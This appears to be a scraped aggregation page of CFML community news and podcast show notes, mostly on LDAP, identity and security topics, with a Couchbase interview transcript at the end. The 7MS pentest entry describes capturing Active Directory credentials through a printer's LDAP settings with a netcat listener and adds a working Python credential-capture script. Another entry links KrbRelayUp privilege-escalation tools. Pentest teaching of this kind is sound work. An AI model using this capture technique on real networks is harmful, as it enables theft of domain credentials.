If you're using FusionReactor, note that a new version 10 (10.0.0) released yesterday, May 18. While it's a new major release number, most of the items listed as new aren't really things that you will "see" as changed in the interface. I don't quite want to call it just "plumbing"--the folks had their reasons to regard the new and changed features as warranting the major version number increase. For more, read on. Of course, I had just last week blogged on the release of FR 9.2.2, released March 1. I'm not letting as much time pass with this post. :-)
https://www.carehart.org/blog/2023/5/19/fusionreactor_10_0_released/

5/22/23 - Blog - Grant Copley - CBWIRE 3.0.0 Released
We are very excited to announce the release of version 3 of CBWIRE, our ColdBox module that makes building modern, reactive apps a breeze. This version brings with it a new component syntax, 19 enhancements and bug fixes, and improved documentation. Our biggest goal with this release was to improve the developer experience and to provide a low barrier to entry for getting started with CBWIRE.
https://www.ortussolutions.com/blog/cbwire-300-released

CFML Jobs
Several positions available on https://www.getcfmljobs.com/
Listing over 67 ColdFusion positions from 43 companies across 32 locations in 5 countries. 4 new jobs listed this week:
- Full-Time - ColdFusion Programmer at Tulsa, OK - United States. Posted May 23. https://www.getcfmljobs.com/jobs/index.cfm/united-states/ColdFusion-Programmer-at-Tulsa-OK/11575
- Full-Time - ColdFusion Engineer at Remote - United States. Posted May 21. https://www.getcfmljobs.com/jobs/index.cfm/united-states/ColdFusionEngineer-at-Remote/11574
- Full-Time - ColdFusion Lead at Pune, Maharashtra - India. Posted May 11. https://www.getcfmljobs.com/jobs/index.cfm/india/ColdFusion-Lead-at-Pune-Maharashtra/11573
- Full-Time - ColdFusion Developer at Pune, Maharashtra - India. Posted May 09. https://www.getcfmljobs.com/jobs/index.cfm/india/ColdFusion-Developer-at-Pune-Maharashtra/11571
Other Job Links
There is a jobs channel in the CFML Slack team, and in the Box team Slack now too.

ForgeBox Module of the Week
TestBox
TestBox is a Behavior Driven Development (BDD) and Test Driven Development (TDD) framework for ColdFusion (CFML). It also includes mocking and stubbing capabilities via its internal MockBox library.
V5 release notes: We are excited to announce the release of TestBox version 5, which brings a host of new features and improvements for developers. TestBox is a powerful and flexible tool that helps developers write comprehensive BDD/TDD tests for their applications, ensuring code quality and reducing the likelihood of bugs and errors. With TestBox v5, developers can take advantage of new features such as batch code coverage testing, improved reporting capabilities, method spies, and better integration with other tools in the Ortus suite. These new features make TestBox even more versatile and user-friendly, and provide developers with a powerful tool for building high-quality, reliable applications. You can read more about TestBox in our comprehensive documentation online: https://testbox.ortusbooks.com/
https://www.forgebox.io/view/testbox

VS Code Hint, Tips and Tricks of the Week
Visual Studio Code Remote - SSH - Preview
By Microsoft. The Remote - SSH extension lets you use any remote machine with an SSH server as your development environment. This can greatly simplify development and troubleshooting in a wide variety of situations. You can:
- Develop on the same operating system you deploy to, or use larger, faster, or more specialized hardware than your local machine.
- Quickly swap between different remote development environments and safely make updates without worrying about impacting your local machine.
- Access an existing development environment from multiple machines or locations.
- Debug an application running somewhere else, such as a customer site or in the cloud.
No source code needs to be on your local machine to gain these benefits, since the extension runs commands and other extensions directly on the remote machine. You can open any folder on the remote machine and work with it just as you would if the folder were on your own machine.
https://marketplace.visualstudio.com/items?itemName=ms-vscode-remote.remote-ssh
Works well with: Visual Studio Code Remote - SSH: Editing Configuration Files
https://marketplace.visualstudio.com/items?itemName=ms-vscode-remote.remote-ssh-edit

Thank you to all of our Patreon Supporters
These individuals are personally supporting our open-source initiatives to ensure that great tooling like CommandBox, ForgeBox, ColdBox, ContentBox, TestBox and all the other boxes keep getting the continuous development they need, and they fund the cloud infrastructure our community relies on, like ForgeBox for our package management with CommandBox. You can support us on Patreon here: https://www.patreon.com/ortussolutions
Don't forget, we have Annual Memberships - pay for the year and save 10% - great for businesses. Bronze packages and up now get ForgeBox Pro and CFCasts subscriptions as a perk for their Patreon subscription.
- All Patreon supporters have a profile badge on the community website
- All Patreon supporters have their own private forum access on the community website
- All Patreon supporters have their own private channel access on the BoxTeam Slack
https://community.ortussolutions.com/
Top Patreons (proficient): John Wilson - Synaptrix, Tomorrows Guides, Jordan Clark, Gary Knight, Mario Rodrigues, Giancarlo Gomez, David Belanger, Dan Card, Jeffry McGee - Sunstar Media, Dean Maunder, Nolan Erck, Abdul Raheen, and many more Patreons.
You can see an up-to-date list of all sponsors on Ortus Solutions' website: https://ortussolutions.com/about-us/sponsors
Thanks everyone!!! ★ Support this podcast on Patreon ★

7 Minute Security
7MS #572: Protecting Your Domain Controllers with LDAP Firewall

7 Minute Security

Play Episode Listen Later May 19, 2023 26:37


Today we look at LDAP Firewall - a cool (and free!) way to defend your domain controllers against SharpHound enumeration, LAPS password enumeration, and the noPac attack.

Laravel News Podcast
Repeating models, extending Raycast, and squeezing lemons

Laravel News Podcast

Play Episode Listen Later May 10, 2023 40:22


Jake and Michael discuss all the latest Laravel releases, tutorials, and happenings in the community. This episode is sponsored by Honeybadger - combining error monitoring, uptime monitoring and check-in monitoring into a single, easy to use platform and making you a DevOps hero.
- (03:30) - Laravel 10.9 released
- (10:55) - Use ChatGPT to ask a question to the Laravel docs
- (14:05) - Create repeatable models with Laravel Recurring Models
- (16:24) - Laravel Artisan Raycast extension
- (18:38) - PostgreSQL full text search for Laravel Scout
- (22:20) - Lemon Squeezy for Laravel
- (26:55) - Sponsor: Honeybadger
- (27:54) - LDAP framework for PHP
- (30:24) - Send toast notifications in your Livewire application with Toaster
- (31:35) - Small but powerful CLI apps with Minicli

7 Minute Security
7MS #547: Tales of Pentest Pwnage - Part 43

7 Minute Security

Play Episode Listen Later Nov 18, 2022 42:33


This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Today we're talking about tales of pentest pwnage - specifically, how much fun printers can be for getting Active Directory creds. TLDL: get into a printer interface, adjust the LDAP lookup IP to be your Kali box, run nc -lvp 389 on your Kali box, and then "test" the credentials via the printer interface in order to (potentially) capture an Active Directory cred! Today we also define an achievement that's fun to unlock called DDAD: Double Domain Admin Dance.
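For the curious, the capture step in that TLDL is simple enough to sketch. Below is a minimal Python stand-in for the `nc -lvp 389` listener (the netcat command is what the episode names; this equivalent is my own illustration). Because the printer's LDAP "test" performs a simple bind, the bind DN and password arrive in cleartext inside the BER-encoded request, so they are usually readable straight out of the dump.

```python
import socket

# Minimal stand-in for "nc -lvp 389": accept one connection from the printer's
# LDAP "test" lookup and dump the raw bind request. In an LDAP simple bind the
# bind DN and password travel in cleartext inside the BER-encoded payload.
# Binding to port 389 needs root; run this on the Kali box the printer points at.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", 389))
    srv.listen(1)
    print("Listening on 389; now hit 'test' in the printer's LDAP settings...")
    conn, peer = srv.accept()
    with conn:
        print(f"Connection from {peer[0]}:{peer[1]}")
        data = conn.recv(4096)
        # Show both hex and an ASCII rendering; the creds show up in the ASCII view.
        print(data.hex())
        print(data.decode("latin-1", errors="replace"))
```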

Python Bytes
#302 The Blue Shirt Episode

Python Bytes

Play Episode Listen Later Sep 20, 2022 33:02


Watch the live stream: Watch on YouTube

About the show: sponsored by Microsoft for Startups Founders Hub.

Brian #1: Can Amazon's CodeWhisperer write better Python than you? (Brian Tarbox)
- "Despite the clickbait-y title, whether CW's code is better or worse than mine is at the margins and not really important. What is significant is that it has the potential to save me a ton of time and mental space to focus on improving, refactoring and testing. It's making me a better programmer by taking on some of the undifferentiated heavy lifting."
- Some decent code generation, starting with Amazon API examples.
- The generated dataclass method was neat, but really, the comment "prompt" probably took as much time to write as the code would have.
- The generated test case is workable, but I would not consider it a good test. Perhaps don't lump together construction, attribute access, and tests for all methods in one test function. That said, I've seen way worse test methods in my career. So, a decent starting point.
- Related and worth listening to: Changelog #506: Stable Diffusion breaks the internet w/ Simon Willison. Mostly an episode about AI-generated art, but there is a bit of a tie-in to AI code generation, the ethics around it, and making sure you walk up the value chain.
- I'm planning on playing with GitHub Copilot. I've been reluctant in the past, but Simon's interview is compelling: combine experienced engineering skill with AI code generation to possibly improve productivity. Simon does warn against possible abuse by junior devs and the "just believe the code" problem that we also see with "copy from StackOverflow" situations.

Michael #2: Apache Superset
Apache Superset is a modern data exploration and visualization platform:
- An intuitive interface for visualizing datasets and crafting interactive dashboards
- A wide array of beautiful visualizations to showcase your data
- Code-free visualization builder to extract and present datasets
- A world-class SQL IDE for preparing data for visualization, including a rich metadata browser
- A lightweight semantic layer which empowers data analysts to quickly define custom dimensions and metrics
- Out-of-the-box support for most SQL-speaking databases
- Seamless, in-memory asynchronous caching and queries
- An extensible security model that allows configuration of very intricate rules on who can access which product features and datasets
- Integration with major authentication backends (database, OpenID, LDAP, OAuth, REMOTE_USER, etc.)
- The ability to add custom visualization plugins
- An API for programmatic customization

Brian #3: Recipes from Python SQLite docs (Redowan Delowar)
Expanding on the sqlite3 Python docs with more examples, including:
- Executing individual and batch statements
- Applying user-defined callbacks, scalar and aggregate (the scalar example shows using a sha256 function to hash passwords as they're inserted into the database)
- Enabling tracebacks when callbacks raise an error
- Transforming types between SQLite and Python
- Implementing authorization control
- ... much more ...
This is great not only for learning SQLite, but also, since these kinds of topics exist in other databases, for learning about databases in general. It's also a great example of learning a subsystem by creating little code snippets to check your understanding of something. One mod I would make in practice is to write these examples as pytest functions, because I can then run them individually while keeping a bunch in the same file.
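The scalar-callback recipe mentioned above is easy to try with nothing but the standard library. Here's a minimal sketch using sqlite3.create_function; the table and column names are made up for illustration, not taken from the article.

```python
import hashlib
import sqlite3

# Scalar user-defined callback: expose a sha256() function to SQL so passwords
# are hashed as they're inserted (the recipe the show notes mention).
def sha256(value: str) -> str:
    return hashlib.sha256(value.encode("utf-8")).hexdigest()

con = sqlite3.connect(":memory:")
con.create_function("sha256", 1, sha256)  # SQL name, number of args, callable

con.execute("CREATE TABLE users (name TEXT, pw_hash TEXT)")
# The hashing happens inside the SQL statement via the registered callback.
con.execute("INSERT INTO users VALUES (?, sha256(?))", ("alice", "hunter2"))

print(con.execute("SELECT name, pw_hash FROM users").fetchone())
```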

Streaming Audio: a Confluent podcast about Apache Kafka
Apache Kafka Security Best Practices

Streaming Audio: a Confluent podcast about Apache Kafka

Play Episode Listen Later Aug 11, 2022 39:10 Transcription Available


Security is a primary consideration for any system design, and Apache Kafka® is no exception. Out of the box, Kafka has relatively little security enabled. Rajini Sivaram (Principal Engineer, Confluent, and co-author of "Kafka: The Definitive Guide") discusses how Kafka has gone from a system that included no security to providing an extensible and flexible platform for any business to build a secure messaging system. She shares considerations, important best practices, and features Kafka provides to help you design a secure modern data streaming system.

In order to build a secure Kafka installation, you need to securely authenticate your users, whether you are using Kerberos (SASL/GSSAPI), SASL/PLAIN, SCRAM, or OAUTH. Verifying that your users can authenticate, and non-users can't, is a primary requirement for any connected system.

But authentication is only one part of the security story. We also need to address other areas. Kafka added support for fine-grained access control using ACLs with a pluggable authorizer several years ago. Over time, this was extended to support prefixed ACLs to make ACLs more manageable in large organizations. Now on its second-generation authorizer, Kafka is easily extendable to support other forms of authorization, like integrating with a corporate LDAP server to provide group- or role-based access control.

Even if you've set up your system to use secure authentication, and each user is authorized using a series of ACLs, how secure is your system if the data is viewable by anyone listening? That's where encryption comes in. Using TLS, Kafka can encrypt your data in transit.

Security has gone from a nice-to-have to a requirement of any modern-day system. Kafka has followed a similar path from zero security to having a flexible and extensible system that helps companies of any size pick the right security path for them. Be sure to also check out the newest Apache Kafka Security course on Confluent Developer for an in-depth explanation along with other recommendations.

EPISODE LINKS
- Kafka Security course
- Kafka: The Definitive Guide v2
- Security Overview
- Watch the video version of this podcast
- Kris Jenkins' Twitter
- Streaming Audio Playlist
- Join the Confluent Community
- Learn more with Kafka tutorials, resources, and guides at Confluent Developer
- Live demo: Intro to Event-Driven Microservices with Confluent
- Use PODCAST100 to get an additional $100 of free Confluent Cloud usage (details)
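To make the authentication-plus-encryption discussion concrete, here is a rough sketch of what SASL/PLAIN over TLS looks like from a client, using the confluent-kafka Python package. The broker address, topic, and credentials are placeholders of my own; the episode itself is not tied to any particular client library.

```python
from confluent_kafka import Producer

# Client-side view of the episode's two themes: authenticate via SASL and
# encrypt data in transit via TLS. All values below are placeholders.
conf = {
    "bootstrap.servers": "broker.example.com:9093",
    "security.protocol": "SASL_SSL",  # TLS for encryption + SASL for authentication
    "sasl.mechanism": "PLAIN",        # could also be SCRAM-SHA-512, GSSAPI, OAUTHBEARER
    "sasl.username": "svc-orders",
    "sasl.password": "change-me",
}

producer = Producer(conf)
# If the credentials are wrong (or the user lacks WRITE ACLs on the topic),
# delivery fails instead of silently succeeding.
producer.produce("orders", key="order-1", value="created")
producer.flush()
```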

Paul's Security Weekly
ESW #275 - Bill Bernard, Paul Lanzi

Paul's Security Weekly

Play Episode Listen Later Jul 29, 2022 114:48


In our research, 85% of security professionals attribute preventable business impacts to insufficient response practices. In this segment, Bill will discuss the key challenges slowing down response times, such as staffing challenges, alert quality, and organizational culture. This segment is sponsored by Deepwatch. Visit https://securityweekly.com/deepwatch to learn more about them!

This week in the Enterprise News: Lacework lays off approximately 300 employees, US narrows scope of anti-hacking law long hated by critics, Security Study Plan, DevSecOps vulnerability management by GuardRails, StackZone, Cipherloc acquires vCISO security services provider SideChannel, Broadcom to buy VMware for $61 billion in record tech deal, Cyscale raises EUR 3 million in seed funding round, and more!

There are a few IETF standards that make the identity world go 'round. SAML, FIDO and LDAP are ones that we know and love... but there's one particularly un-loved standard that is the glue between most identity systems -- cloud and on-prem -- out there. It's called SCIM and -- good news -- smart people are working on improving this 10+ year old standard. Big changes coming, and here to talk with us about it is Paul Lanzi... Segment Resources: https://identiverse.com/idv2022/ (Paul on Wednesday)

Visit https://www.securityweekly.com/esw for all the latest episodes!
Follow us on Twitter: https://www.twitter.com/securityweekly
Like us on Facebook: https://www.facebook.com/secweekly
Show Notes: https://securityweekly.com/esw275

Enterprise Security Weekly (Audio)
ESW #275 - Bill Bernard, Paul Lanzi

Enterprise Security Weekly (Audio)

Play Episode Listen Later Jul 29, 2022 114:48


In our research, 85% of security professionals attribute preventable business impacts to insufficient response practices. In this segment, Bill will discuss the key challenges slowing down response times, such as staffing challenges, alert quality, and organizational culture. This segment is sponsored by Deepwatch. Visit https://securityweekly.com/deepwatch to learn more about them!

This week in the Enterprise News: Lacework lays off approximately 300 employees, US narrows scope of anti-hacking law long hated by critics, Security Study Plan, DevSecOps vulnerability management by GuardRails, StackZone, Cipherloc acquires vCISO security services provider SideChannel, Broadcom to buy VMware for $61 billion in record tech deal, Cyscale raises EUR 3 million in seed funding round, and more!

There are a few IETF standards that make the identity world go 'round. SAML, FIDO and LDAP are ones that we know and love... but there's one particularly un-loved standard that is the glue between most identity systems -- cloud and on-prem -- out there. It's called SCIM and -- good news -- smart people are working on improving this 10+ year old standard. Big changes coming, and here to talk with us about it is Paul Lanzi... Segment Resources: https://identiverse.com/idv2022/ (Paul on Wednesday)

Visit https://www.securityweekly.com/esw for all the latest episodes!
Follow us on Twitter: https://www.twitter.com/securityweekly
Like us on Facebook: https://www.facebook.com/secweekly
Show Notes: https://securityweekly.com/esw275

Get Certified Together - CompTIA Security Sy+ 601
Episode 6 - Security Implementation - Part 1

Get Certified Together - CompTIA Security Sy+ 601

Play Episode Listen Later Jul 7, 2022 14:19


In this episode, I will be covering topics from Domain 3 of CompTIA Security+ SY0-601. Topics covered in the episode:
- Identity and Access Management
- Authentication, Authorization, and Accounting
- Role-Based Access Controls
- Multi-Factor Authentication
- RADIUS, LDAP, SAML, and OpenID

AVLEONOV Podcast
Ep.67 - Microsoft Patch Tuesday June 2022: Follina RCE, NFSV4.1 RCE, LDAP RCEs and bad patches

AVLEONOV Podcast

Play Episode Listen Later Jun 25, 2022 6:19


Hello everyone! This will be an episode about the Microsoft vulnerabilities that were released on June Patch Tuesday and also between May and June Patch Tuesdays. On June Patch Tuesday, June 14, 56 vulnerabilities were released. Between May and June Patch Tuesdays, 38 vulnerabilities were released. This gives us 94 vulnerabilities in the report. Watch the video version of this episode on my YouTube channel. Read the full text of this episode with all links on avleonov.com blog.

InfoSec Overnights - Daily Security News
Cisco Email Patch, Android Malibot, Zimbra Zinger, and more.

InfoSec Overnights - Daily Security News

Play Episode Listen Later Jun 16, 2022 3:02


A daily look at the relevant information security news from overnight - 16 June, 2022. Episode 246.
- Cisco Email Patch - https://www.bleepingcomputer.com/news/security/cisco-secure-email-bug-can-let-attackers-bypass-authentication/
- Android MaliBot - https://www.zdnet.com/article/this-new-android-malware-bypasses-multi-factor-authentication-to-steal-your-passwords/
- PrintNightmare Still Exposed - https://www.infosecurity-magazine.com/news/new-printnightmare-patch-bypassed/
- Shoprite Compromised - https://www.bleepingcomputer.com/news/security/extortion-gang-ransoms-shoprite-largest-supermarket-chain-in-africa/
- Zimbra Zinger - https://portswigger.net/daily-swig/business-email-platform-zimbra-patches-memcached-injection-flaw-that-imperils-user-credentials

Hi, I'm Paul Torgersen. It's Thursday, June 16th, 2022, and this is a look at the information security news from overnight.

From BleepingComputer.com: Cisco is warning customers to patch a critical vulnerability that could allow attackers to log in to the web management interface of Cisco Email Security Appliance (ESA) and Cisco Secure Email and Web Manager appliances. The flaw is due to improper authentication checks on affected devices using Lightweight Directory Access Protocol (LDAP) for external authentication.

From ZDNet.com: A new Android malware called MaliBot steals passwords, bank details and crypto wallets, and bypasses multi-factor authentication. Oh, it can also access text messages, steal browser cookies and take screenshots. It is distributed through smishing and fake websites, one of which spoofs a legit crypto tracker that has more than a million downloads on the Play Store. Current targets are customers of Spanish and Italian banks.

From Infosecurity-Magazine.com: On Tuesday, Microsoft released a partial patch for the PrintNightmare zero-day. On Wednesday they pushed an out-of-band patch for the remaining affected products. Later Wednesday, researchers found a way around the new patch to still exploit the original vulnerability. The ongoing flaw relates to the Point and Print function, which Microsoft says is not directly related to the flaw, but which has a weak security posture that makes exploitation possible.

From BleepingComputer.com: Africa's largest supermarket chain, Shoprite, has been hit by a ransomware attack. The company, which operates almost three thousand stores across twelve countries on the continent, warned customers in Eswatini, Namibia and Zambia that their personal information may have been compromised. A threat group called RansomHouse has claimed responsibility for the attack. There has been no mention of any business disruptions or operational issues, so this may be a straight data theft with no files encrypted.

And last today, from PortSwigger.net: Business webmail platform Zimbra has patched a memcached injection vulnerability that could allow attackers to steal login credentials without user interaction. It would steal cleartext credentials from the Zimbra instance when the mail client connects to the server to check mail. Details and a link to the Sonar research in the article.

That's all for me today. Have a great rest of your day. Like and subscribe, and until tomorrow, be safe out there.

Paul's Security Weekly TV
What's Happening with SCIM - Paul Lanzi - ESW #275

Paul's Security Weekly TV

Play Episode Listen Later Jun 14, 2022 28:49


There are a few IETF standards that make the identity world go 'round. SAML, FIDO and LDAP are ones that we know and love... but there's one particularly un-loved standard that is the glue between most identity systems -- cloud and on-prem -- out there. It's called SCIM and -- good news -- smart people are working on improving this 10+ year old standard. Big changes coming, and here to talk with us about it is Paul Lanzi...   Segment Resources: https://identiverse.com/idv2022/ (Paul on Wednesday)   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw275
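If you've never seen SCIM on the wire, it's worth knowing how plain it is: provisioning a user is just a REST POST of a standardized JSON schema (RFC 7643/7644) to a /Users endpoint. A rough Python sketch follows; the base URL and bearer token are hypothetical, since every IdP and app exposes its own SCIM endpoint.

```python
import requests

# Minimal SCIM 2.0 user-provisioning call (RFC 7643 schema, RFC 7644 protocol).
# SCIM_BASE and TOKEN are placeholders, not a real service.
SCIM_BASE = "https://idp.example.com/scim/v2"
TOKEN = "change-me"

user = {
    "schemas": ["urn:ietf:params:scim:schemas:core:2.0:User"],
    "userName": "alice@example.com",
    "name": {"givenName": "Alice", "familyName": "Ng"},
    "emails": [{"value": "alice@example.com", "primary": True}],
    "active": True,
}

resp = requests.post(
    f"{SCIM_BASE}/Users",
    json=user,
    headers={
        "Authorization": f"Bearer {TOKEN}",
        "Content-Type": "application/scim+json",
    },
    timeout=10,
)
resp.raise_for_status()
print(resp.json()["id"])  # server-assigned SCIM resource id
```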

Enterprise Security Weekly (Video)
What's Happening with SCIM - Paul Lanzi - ESW #275

Enterprise Security Weekly (Video)

Play Episode Listen Later Jun 14, 2022 28:49


There are a few IETF standards that make the identity world go 'round. SAML, FIDO and LDAP are ones that we know and love... but there's one particularly un-loved standard that is the glue between most identity systems -- cloud and on-prem -- out there. It's called SCIM and -- good news -- smart people are working on improving this 10+ year old standard. Big changes coming, and here to talk with us about it is Paul Lanzi...   Segment Resources: https://identiverse.com/idv2022/ (Paul on Wednesday)   Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw275

The Cyber Threat Perspective
Threat Intel Flash Briefing - Kerberos Relaying to Local SYSTEM

The Cyber Threat Perspective

Play Episode Listen Later Apr 27, 2022 23:59


There exists a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced (the default setting). Thanks to the research and open-source tools of several researchers, it's now trivial to elevate to SYSTEM on most Windows operating systems.
Resources:
- https://github.com/Dec0ne/KrbRelayUp
- https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html
- https://github.com/cube0x0/KrbRelay
Social:
- https://twitter.com/cyberthreatpov
- https://www.youtube.com/channel/UCCWmudG_CTNAFBaV48vIcfw
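A quick way to understand the precondition here: when a domain controller enforces LDAP signing, it rejects cleartext simple binds with resultCode 8 (strongerAuthRequired), which is the behavior most signing scanners key on. Below is a rough Python sketch of that check using the ldap3 library; the hostname and account are placeholders, and this is my own illustration rather than any tool from the episode.

```python
from ldap3 import Server, Connection

# Rough check for the precondition KrbRelayUp abuses: if a DC enforces LDAP
# signing, a simple bind over cleartext LDAP (port 389, no TLS) is rejected
# with resultCode 8 (strongerAuthRequired) before credentials are evaluated.
# Hostname and credentials are placeholders; use a low-privilege test account.
server = Server("dc01.corp.example.com", port=389, use_ssl=False)
conn = Connection(server, user="CORP\\lowpriv", password="change-me")

if conn.bind():
    print("Cleartext simple bind succeeded: LDAP signing is NOT enforced.")
elif conn.result.get("description") == "strongerAuthRequired":
    print("Bind rejected with strongerAuthRequired: signing is enforced.")
else:
    print(f"Bind failed for another reason: {conn.result}")
```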

Screaming in the Cloud
To SQL or noSQL, Why is that the Question with Chris Harris

Screaming in the Cloud

Play Episode Listen Later Apr 26, 2022 40:33


About ChrisChris Harris is Vice President, Global Field Engineering at Couchbase, a provider of a leading modern database for enterprise applications that 30% of the Fortune 100 depend on. With almost 20 years of technical field and professional services experience at early-stage, open source and growth technology companies, Chris held leadership roles at Cloudera, Hortonworks, MongoDB and others before joining Couchbase.Links Referenced: couchbase.com: https://couchbase.com LinkedIn: https://www.linkedin.com/in/chris-harris-5451953/ Twitter: https://twitter.com/cj_harris5 TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Couchbase Capella Database-as-a-Service is flexible, full-featured and fully managed with built in access via key-value, SQL, and full-text search. Flexible JSON documents aligned to your applications and workloads. Build faster with blazing fast in-memory performance and automated replication and scaling while reducing cost. Capella has the best price performance of any fully managed document database. Visit couchbase.com/screaminginthecloud to try Capella today for free and be up and running in three minutes with no credit card required. Couchbase Capella: make your data sing.Corey: This episode is sponsored in part by LaunchDarkly. Take a look at what it takes to get your code into production. I'm going to just guess that it's awful because it's always awful. No one loves their deployment process. What if launching new features didn't require you to do a full-on code and possibly infrastructure deploy? What if you could test on a small subset of users and then roll it back immediately if results aren't what you expect? LaunchDarkly does exactly this. To learn more, visit launchdarkly.com and tell them Corey sent you, and watch for the wince.Corey: Welcome to Screaming in the Cloud. I'm Corey Quinn. One of the stranger parts of running this show is when I have a promoted guest episode like this one, where someone comes on, and great, “Oh, where do you work?” And the answer is a database company. Well, great, unless it's Route 53, it's clearly not the best database in the world, but let's talk about how you're making a strong showing for number two.It sounds like it's this whole ridiculous, negging nonsense or whatever the kids are calling it these days, but that's not how it's intended. Today's promoted guest is Chris Harris, who's the Vice President of Global Field Engineering at Couchbase. Chris, thank you for joining me and I really hope I got it right and that Couchbase is a database company or that makes no sense whatsoever.Chris: It's great to be on the show, and thank you for the invitation. I'm looking forward to it. Yeah, we're a database company. That's exactly what we do.Corey: I always find it interesting when companies start pivoting from a thing that they were and, “What do you do?” “We build databases.” [unintelligible 00:01:29] getting out of that space it's, “What do you do?” “We're a finance company.” And then there's a period of time in which they start reframing what they do. It's, “We're a data platform.” Or, “We're now a tech company.”Really? Because I don't get that sense in any meaningful perspective. 
Couchbase was founded as a database company. You went public last year—congratulations on that—and now you continue to say, “Yes, we're a database company,” rather than an everything trying to eat the world all at the same time, mostly ineffectively, company. So, what kind of database are you folks?Chris: So, if you look at the database world, you can see—I've been in the space for quite some time now, a good few years, and I've had the privilege, if you like, of being at other database companies, been in the analytics space, and I'm here at Couchbase. But if you look at the history over the last—let's just not go back all the way that far, but let's go back to, like, ten years ago, everybody was building their applications on traditional relational databases. And what you saw is that the Oracle and MySQL, as traditional databases of the world. And then… probably at the time, we realized that with, talking ten years ago where we had this demand for high throughput of data, next generation of applications will be built, and then people realized the traditional database architectures weren't going to cut it, if you like. And it spawned this industry.You know, a big NoSQL market was created. And you have document databases, and then you have graph databases, and then you have analytics databases, and you have search databases, and then you have every sort of database you could possibly think of type database that's out there in the world.Corey: You have so many kinds you need to keep track of it all inside of the database.Chris: That's what you have to do, right? [laugh]. But the interesting thing is it became different types of database. And even see this in many of the code providers today, right, that you have multiple different types of databases no matter what you're trying to do, right? So, we kind of went—Couchbase kind of took a step back and went, okay, we were originally a cache, right, this is where we came from, and then kind of built that into a document database, and then kind of went to the market and went hold on here, rather than it being let's call it a noSQL versus SQL discussion, why can't it just be a database, right?Why can't you have a SQLite interface on top of a modern architecture? Why can you do that, right? Why can't you have the flexibility and architectural [unintelligible 00:04:16] of a JSON-based database with the interface of—with SQL, and then analytics built on top of that, right? So, why can't you have the power of SQL on the next generation architecture? So, that's kind of where we fit in the world.Corey: When we talk about origin stories and where things come from, well, let's start with you. I guess the impolite version of the question is, “Why on earth would you be in a space like this for so long?” But you've been on a lot of interesting places doing somewhat similar things. You were at Cloudera, you were at Hortonworks until you apparently heard a who or whatnot, you were at MongoDB, you were at VMware, you were at Red Hat. And that's going reverse chronologically, but it's clear that you're very focused on a particular expression of a particular problem. Why are you the way that you are? Only pretend that's a polite question.Chris: “Why am I the way that I am?” Well, first of all, I love technology, right? That's the key. And I think many of us in the industry would definitely say that, right? 
I started off in core engineering, building—I know some people today probably wouldn't remember this, but when you had Chip and PIN with your credit card and you had to type in a PIN number—that was created originally in the UK—and then went off and built e-commerce websites for retailers.

Well, that then turned into—a common theme that I kept seeing was that a lot of the technology we were using was open-source technology. And that kind of got me into the open-source movement, if you like, and I was lucky enough to then join Red Hat when they built middleware frameworks, so I got into that space there. And then did a lot of innovation in the middleware space. Went to SpringSource and we did some great work there in the Java development framework space. But what became interesting is that—you still see it today—there's all this innovation happening in that middleware space, and there's some great innovation happening, right? There's all this stuff with Lambda and serverless architecture that's out there, but it always came back to: we've got the database, this thing that is in the architecture and, if it goes down, you're stuffed, right? This is where the core value of your company is sitting. So, then that got me interested to see what innovation was happening in this space. And as I say, I got into this field in the early stages of NoSQL, where there was that spawn of new database technologies being created. And then from there, it was like, “Okay, let's get into what was happening in the analytics space.” Again, this is the Hortonworks and Cloudera space; that's all open-source. But it came down to this: different types of databases required different types of skills. And then I started talking to the team here, who were like, “How can we take this great innovation and leverage the skills people already have?” And I thought that was an interesting point.

Corey: In the interest of full disclosure, I tend to take the exact inverse approach to the way that you did. When I was going through the worlds of systems administrator, then rebadged as DevOps, or SRE, or systems engineer, production engineer, whatever we're calling ourselves this week, I was always focused primarily on stateless things like web servers or whatnot because it turns out that—this should be no surprise to longtime listeners of this show—but I'm really bad with computers. And most other things, too; I just brute-force my way through it. And that's hilarious when you keep taking down web servers you can push a button and recreate. When you do that to a database or anything that's stateful, it leaves a mark. And if you do it the wrong way, just well enough, you might not have a company anymore, so your DR plan starts to look a lot more like updating your resume. So, I always tried to shy away from things that played to my specific weaknesses that would, you know, follow me around like a stink. You, on the other hand, apparently sound—how to frame it—you know, good at things, in a way that I never was. So you're—ah, you see a problem, you're running towards it trying to help fix it; my first approach is trying to figure out how I keep myself away from making the problem worse.
It seems like you have definitely been focused on not just data themselves—I mean, at some level, [if it was a 00:08:55] pure data problem, it feels like we'd be talking a lot more about storage—but rather how to wind up organizing that data, how to wind up presenting that data, and the relationship that data has to other things that are going on. I'm not speaking in the sense of a traditional relational database, necessarily, but the idea of how that data empowers businesses and enables them to do different things. Is that directionally a fair synopsis of how you see it?

Chris: I think the [unintelligible 00:09:21] thing is what I would agree with. What makes it really interesting to me is what we enable people to do with that data, and being able to build, kind of, really fascinating, innovative applications that are affecting their underlying businesses, right? It could be health care, it could be airlines, financial services—some really interesting, high-end use cases that people are doing that are leveraging the database to be able to drive that level of innovation. Because it's very difficult; I can build some sophisticated application, but if I can't get the performance out of my database, I deliver a pretty poor experience to my users in today's world. Because, fortunately or unfortunately, people aren't very patient, right? If you have a website that doesn't return very quickly, a customer's gone, like, minutes ago. You've literally got to instantly respond to someone. That's a challenging problem.

